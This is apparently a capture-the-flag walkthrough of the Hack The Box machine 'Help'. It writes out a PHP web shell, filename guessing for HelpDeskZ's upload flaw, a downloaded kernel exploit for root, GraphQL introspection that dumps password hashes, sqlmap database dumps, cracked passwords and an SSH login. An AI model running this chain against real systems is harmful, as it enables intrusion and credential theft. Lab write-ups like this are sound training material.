Help

Port Enum

naabu -host help.htb

                  __
  ___  ___  ___ _/ /  __ __
 / _ \/ _ \/ _ \/ _ \/ // /
/_//_/\_,_/\_,_/_.__/\_,_/ v2.0.5

		projectdiscovery.io

Use with caution. You are responsible for your actions
Developers assume no liability and are not responsible for any misuse or damage.
[INF] Running CONNECT scan with non root privileges
[INF] Found 3 ports on host help.htb (10.10.10.121)
help.htb:80
help.htb:22
help.htb:3000

PORT     STATE SERVICE REASON  VERSION
22/tcp   open  ssh     syn-ack OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e5bb4d9cdeaf6bbfba8c227ad8d74328 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZY4jlvWqpdi8bJPUnSkjWmz92KRwr2G6xCttorHM8Rq2eCEAe1ALqpgU44L3potYUZvaJuEIsBVUSPlsKv+ds8nS7Mva9e9ztlad/fzBlyBpkiYxty+peoIzn4lUNSadPLtYH6khzN2PwEJYtM/b6BLlAAY5mDsSF0Cz3wsPbnu87fNdd7WO0PKsqRtHpokjkJ22uYJoDSAM06D7uBuegMK/sWTVtrsDakb1Tb6H8+D0y6ZQoE7XyHSqD0OABV3ON39GzLBOnob4Gq8aegKBMa3hT/Xx9Iac6t5neiIABnG4UP03gm207oGIFHvlElGUR809Q9qCJ0nZsup4bNqa/
|   256 d5b010507486a39fc5536f3b4a246119 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHINVMyTivG0LmhaVZxiIESQuWxvN2jt87kYiuPY2jyaPBD4DEt8e/1kN/4GMWj1b3FE7e8nxCL4PF/lR9XjEis=
|   256 e21b88d37621d41e38154a8111b79907 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIHxDPln3rCQj04xFAKyecXJaANrW3MBZJmbhtL4SuDYX
80/tcp   open  http    syn-ack Apache httpd 2.4.18
| http-methods: 
|_  Supported Methods: POST OPTIONS GET HEAD
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.18 (Ubuntu)
3000/tcp open  http    syn-ack Node.js Express framework
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
Service Info: Host: 127.0.1.1; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Open ports

22 SSH
80 Web Default Apache page
3000 Node js page

port 80

gobuster dir -u http://help.htb -w /usr/share/wordlists/dirb/common.txt -o help-gobuster-common


/javascript           (Status: 301) [Size: 309] [--> http://help.htb/javascript/]
/support              (Status: 301) [Size: 306] [--> http://help.htb/support/]

searchsploit


HelpDeskZ 1.0.2 - Arbitrary File Upload                                                                                                   | php/webapps/40300.py

HelpDeskZ < 1.0.2 - (Authenticated) SQL Injection / Unauthorized File Download                                                            | php/webapps/41200.py

Accoding to Searchsploit , it is vulnerable to Arbitrary File Upload Using guessable filename

$filename = md5($_FILES['attachment']['name'].time())...$ext;

https://www.exploit-db.com/exploits/40300

Possible Requirement

md5(shellname+ epoch timestamp) + .php

cmd.php

<?php system($_REQUEST['cmd']); ?>

upload it to the website as ticket attachment

Check for time when the file uploaded to capture the md5 hash

Tue, 22 Aug 2023 18:14:38 GMT

Epoch timestamp: 1692728078

https://www.epochconverter.com/

Crafting

php -a

Interactive shell

php > echo md5("cmd.php1692728078");
2d168d930b0db771fb762c112cfb3cae

calling the webshell

curl http://10.10.10.121/support/uploads/tickets/2d168d930b0db771fb762c112cfb3cae.php?cmd=id

<p>The document has moved <a href="http://help.htb/?cmd=id">here</a>.</p>

change ip to domain name

curl http://help.htb/support/uploads/tickets/2d168d930b0db771fb762c112cfb3cae.php?cmd=id
uid=1000(help) gid=1000(help) groups=1000(help),4(adm),24(cdrom),30(dip),33(www-data),46(plugdev),114(lpadmin),115(sambashare)

Checking linux version

$ whoami
help
$ sudo -l
sudo: no tty present and no askpass program specified
$ uname -a
Linux help 4.4.0-116-generic #140-Ubuntu SMP Mon Feb 12 21:23:04 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux

https://www.exploit-db.com/exploits/44298
https://www.exploit-db.com/raw/44298

Download , compile and run and root

wget http://ip:8000/kernal.c

gcc kernal.c -o kernnale
./kernnale

port 3000

graphw00f to check for graphql

git clone https://github.com/dolevf/graphw00f.git         

./main.py -d -f -t http://help.htb:3000

                +-------------------+
                |     graphw00f     |
                +-------------------+
                  ***            ***
                **                  **
              **                      **
    +--------------+              +--------------+
    |    Node X    |              |    Node Y    |
    +--------------+              +--------------+
                  ***            ***
                     **        **
                       **    **
                    +------------+
                    |   Node Z   |
                    +------------+

                graphw00f - v1.1.10
          The fingerprinting tool for GraphQL
           Dolev Farhi <dolev@lethalbit.com>
  
[*] Checking http://help.htb:3000/
[*] Checking http://help.htb:3000/graphql
[!] Found GraphQL at http://help.htb:3000/graphql
[*] Attempting to fingerprint...
[*] Discovered GraphQL Engine: (Flutter - GraphQL for Dart)
[!] Attack Surface Matrix: https://github.com/nicholasaleks/graphql-threat-matrix/blob/master/implementations/gql-dart.md
[!] Technologies: Dart
[!] Homepage: https://github.com/zino-app/graphql-flutter
[*] Completed.

Get fields from schema

curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __schema { queryType { name, fields { name, description } } } }" }' | jq -c .

Result

{"data":{"__schema":{"queryType":{"name":"Query","fields":[{"name":"user","description":""}]}}}}

Get user type , strings etc

curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __schema { types { name } } }" }' | jq -c .

Result

:{"__schema":{"types":[{"name":"Query"},{"name":"User"},{"name":"String"},{"name":"__Schema"},{"name":"__Type"},{"name":"__TypeKind"},{"name":"Boolean"},{"name":"__Field"},{"name":"__InputValue"},{"name":"__EnumValue"},{"name":"__Directive"},{"name":"__DirectiveLocation"}]}}}

Get user tables

curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ __type(name: \"User\") { name fields { name } } }" }' | jq .

Result

{
  "data": {
    "__type": {
      "name": "User",
      "fields": [
        {
          "name": "username"
        },
        {
          "name": "password"
        }
      ]
    }
  }
}

Select data from user table

curl -s 10.10.10.121:3000/graphql -H "Content-Type: application/json" -d '{ "query": "{ user { username password } }" }' | jq .

Result

{
  "data": {
    "user": {
      "username": "helpme@helpme.com",
      "password": "5d3c93182bb20f07b994a7f617e99cff"
    }
  }
}

Crackstation Result

helpme@helpme.com : godhelpmeplz

Can be used to login on port 80
Login and submit a valid ticket
Click any of the ticket and check where the attachment link to

Intercept the request and sqlmap

sqlmap -r sql-help --level 5 --risk 3 -p param[] --dump

[03:18:45] [INFO] retrieved: articles
[03:18:48] [INFO] retrieved: attachments
[03:18:51] [INFO] retrieved: canned_response
[03:18:56] [INFO] retrieved: custom_fields
[03:19:01] [INFO] retrieved: departments
[03:19:05] [INFO] retrieved: emails
[03:19:07] [INFO] retrieved: error_log
[03:19:10] [INFO] retrieved: file_types
[03:19:14] [INFO] retrieved: knowledgebase_category
[03:19:22] [INFO] retrieved: login_attempt
[03:19:26] [INFO] retrieved: login_log
[03:19:28] [INFO] retrieved: news
[03:19:29] [INFO] retrieved: pages
[03:19:32] [INFO] retrieved: priority
[03:19:34] [INFO] retrieved: settings
[03:19:37] [INFO] retrieved: staff
[03:19:39] [INFO] retrieved: tickets
[03:19:42] [INFO] retrieved: tickets_messages
[03:19:46] [INFO] retrieved: users


sqlmap -r sql-help --level 5 --risk 3 -p param[] --dump -T "staff"  

Database: support
Table: staff
[1 entry]
+----+--------------------+------------+--------+---------+----------+---------------+----------+----------+--------------------------------+------------------------------------------+--------------------+------------+------------------------+
| id | email              | login      | avatar | admin   | status   | fullname      | timezone | username | signature                      | password                                 | department         | last_login | newticket_notification |
+----+--------------------+------------+--------+---------+----------+---------------+----------+----------+--------------------------------+------------------------------------------+--------------------+------------+------------------------+
| 1  | support@mysite.com | 1547216217 | NULL   | 1       | Enable   | Administrator | <blank>  | admin    | Best regards,\r\nAdministrator | d318f44739dced66793b1a603028133a76ae680e | a:1:{i:0;s:1:"1";} | 1543429746 | 0                      |
+----+--------------------+------------+--------+---------+----------+---------------+----------+----------+--------------------------------+------------------------------------------+--------------------+------------+------------------------+

Crackstation

d318f44739dced66793b1a603028133a76ae680e : Welcome1

ssh

help: Welcome1
ssh help@help.htb

PreviousKeeper NextCronos

Last updated 2 years ago